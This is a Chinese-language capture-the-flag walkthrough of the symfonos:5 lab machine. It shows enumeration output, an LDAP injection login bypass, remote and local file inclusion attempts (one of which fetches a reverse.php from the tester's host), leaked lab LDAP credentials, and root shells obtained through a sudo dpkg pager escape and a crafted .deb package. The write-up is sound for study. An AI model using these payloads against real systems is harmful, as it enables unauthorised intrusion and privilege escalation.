本文內(nèi)容純屬虛構(gòu)，攻略鴨求b站關(guān)注點(diǎn)贊支持！

靶機(jī)IP地址：192.168.31.197

測(cè)試機(jī)IP地址：192.168.31.38

外部信息收集

訪問http://192.168.31.197/只有一個(gè)圖片。

端口掃描

PORT ? ?STATE SERVICE ?REASON ? ? ? ? VERSION
22/tcp ?open ?ssh ? ? ?syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp ?open ?http ? ? syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ ?Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
389/tcp open ?ldap ? ? syn-ack ttl 63 OpenLDAP 2.2.X - 2.3.X
636/tcp open ?ldapssl? syn-ack ttl 63
LDAP Results
| ? <ROOT>
| ? ? ? namingContexts: dc=symfonos,dc=local
| ? ? ? supportedControl: 2.16.840.1.113730.3.4.18
...
| ? ? ? supportedSASLMechanisms: GSSAPI
| ? ? ? supportedSASLMechanisms: DIGEST-MD5
| ? ? ? supportedSASLMechanisms: OTP
| ? ? ? supportedSASLMechanisms: NTLM
| ? ? ? supportedSASLMechanisms: CRAM-MD5
|_ ? ? ?subschemaSubentry: cn=Subschema

LDAP匿名登錄

$ ldapdomaindump 192.168.31.197

失敗

網(wǎng)站目錄枚舉

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.197/FUZZ -e .php,.txt -c
.php ? ? ? ? ? ? ? ? ? ?[Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 2ms]
home.php ? ? ? ? ? ? ? ?[Status: 302, Size: 979, Words: 117, Lines: 29, Duration: 2ms]
admin.php ? ? ? ? ? ? ? [Status: 200, Size: 1650, Words: 707, Lines: 40, Duration: 1ms]
static ? ? ? ? ? ? ? ? ?[Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 0ms]
logout.php ? ? ? ? ? ? ?[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 0ms]
portraits.php ? ? ? ? ? [Status: 200, Size: 165, Words: 10, Lines: 4, Duration: 13ms]
server-status ? ? ? ? ? [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 0ms]

訪問http://192.168.31.197/admin.php為登錄界面

嘗試SQLi

GET /admin.php?username=admin%27or%271&password=asfd

未成功

發(fā)現(xiàn)漏洞測(cè)試點(diǎn)

(1)敏感信息發(fā)現(xiàn)

GET /home.php

返回包：

HTTP/1.1 302 Found

data中看到http://127.0.0.1/home.php?url=http://127.0.0.1/portraits.php

(2)LDAP注入

想到存在LDAP服務(wù)，嘗試LDAP注入。

GET /admin.php?username=*&password=*
登錄成功
發(fā)現(xiàn)存在頁(yè)面http://127.0.0.1/home.php?url=http://127.0.0.1/portraits.php
修改URL為http://192.168.31.197/home.php?url=http://127.0.0.1/portraits.php

測(cè)試文件包含漏洞

嘗試RFI

http://192.168.31.197/home.php?url=http://192.168.31.38:8088/reverse.php

發(fā)現(xiàn)PHP文件未解析

GET /home.php?url=http://127.0.0.1/admin.php

顯示了頁(yè)面內(nèi)容，但無(wú)PHP

嘗試LFI

GET /home.php?url=admin.php

返回包中：

$ldap_ch = ldap_connect("ldap://172.18.0.22");
$bind = ldap_bind($ldap_ch, "cn=admin,dc=symfonos,dc=local", "qMDdyZh3cT6eeAWD");
$filter = "(&(uid=$username)(userPassword=$password))";
$result = ldap_search($ldap_ch, "dc=symfonos,dc=local", $filter);

訪問LDAP

通過(guò)jxplorer

DN：cn=admin,dc=symfonos,dc=local

密碼：qMDdyZh3cT6eeAWD

通過(guò)ldapsearch

$ ldapsearch -x -H ldap://192.168.31.197 -D 'cn=admin,dc=symfonos,dc=local' -w qMDdyZh3cT6eeAWD -b 'dc=symfonos,dc=local'
# symfonos.local
dn: dc=symfonos,dc=local
objectClass: top
objectClass: dcObject
objectClass: organization
o: symfonos
dc: symfonos

# admin, symfonos.local
dn: cn=admin,dc=symfonos,dc=local
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: admin
description: LDAP administrator
userPassword:: e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=

# zeus, symfonos.local
dn: uid=zeus,dc=symfonos,dc=local
uid: zeus
cn: zeus
sn: 3
objectClass: top
objectClass: posixAccount
objectClass: inetOrgPerson
loginShell: /bin/bash
homeDirectory: /home/zeus
uidNumber: 14583102
gidNumber: 14564100
userPassword:: Y2V0a0tmNHdDdUhDOUZFVA==
mail: zeus@symfonos.local
gecos: Zeus User

登錄后得到：

cn admin
userPassword:
{SSHA}UWYxvuhA0bWsjfr2bhtxQbapr9eSgKVm

cn:zeus
gecos:Zeus User
gidNumber:14564100
homeDirectory:/home/zeus
loginShell:/bin/bash
mail:zeus@symfonos.local
objectClass:
top
posixAccount
inetOrgPerson
sn:3
uid:zeus
uidNumber:14583102
userPassword:cetkKf4wCuHC9FET

通過(guò)用戶名口令嘗試連接SSH

ssh zeus@192.168.31.197
zeus@symfonos5:~$ id
uid=1000(zeus) gid=1000(zeus) groups=1000(zeus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

sudo提權(quán)

$ sudo -l
Matching Defaults entries for zeus on symfonos5:
? env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zeus may run the following commands on symfonos5:
? (root) NOPASSWD: /usr/bin/dpkg

方法1

$ sudo dpkg -l
!/bin/sh
ii ?cpio ? ? ? ? ? ? ?2.12+dfsg-9 ? ? ? ? amd64 ? ? GNU cpio -- a program to manage archives of files
ii ?cpp ? ? ? ? ? ? ?4:8.3.0-1 ? ? ? ? ?amd64 ? ? GNU C preprocessor (cpp)
ii ?cpp-8 ? ? ? ? ? ? 8.3.0-6 ? ? ? ? ? amd64 ? ? GNU C preprocessor
ii ?cron ? ? ? ? ? ? ?3.0pl1-134+deb10u1 ? ? ?amd64 ? ? process scheduling daemon
羅列時(shí)在底部輸入：
!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)

方法2

fpm需要rubygems等，Debian類系統(tǒng)安裝:
sudo apt-get install ruby ruby-dev rubygems build-essential
sudo gem install --no-document fpm
fpm --version

touch exp.sh
echo 'exec /bin/sh' > exp.sh
fpm -n x -s dir -t deb -a all --before-install exp.sh .
ls -al
-rw-r--r-- ?1 kali kali 8341274 Feb 21 04:38 x_1.0_all.deb
傳到靶機(jī)
$ sudo dpkg -i x_1.0_all.deb
Selecting previously unselected package x.
(Reading database ... 53057 files and directories currently installed.)
Preparing to unpack x_1.0_all.deb ...
# id
uid=0(root) gid=0(root) groups=0(root)

其他

flag

# cat /root/proof.txt
Congrats on rooting symfonos:5!

靶機(jī)問題

fuzz LDAP和LFI時(shí)未成功，錯(cuò)誤返回Wrong scheme! You can only use http or https!還十分逼真，以為是過(guò)濾了。重新導(dǎo)入虛擬機(jī)才可能好。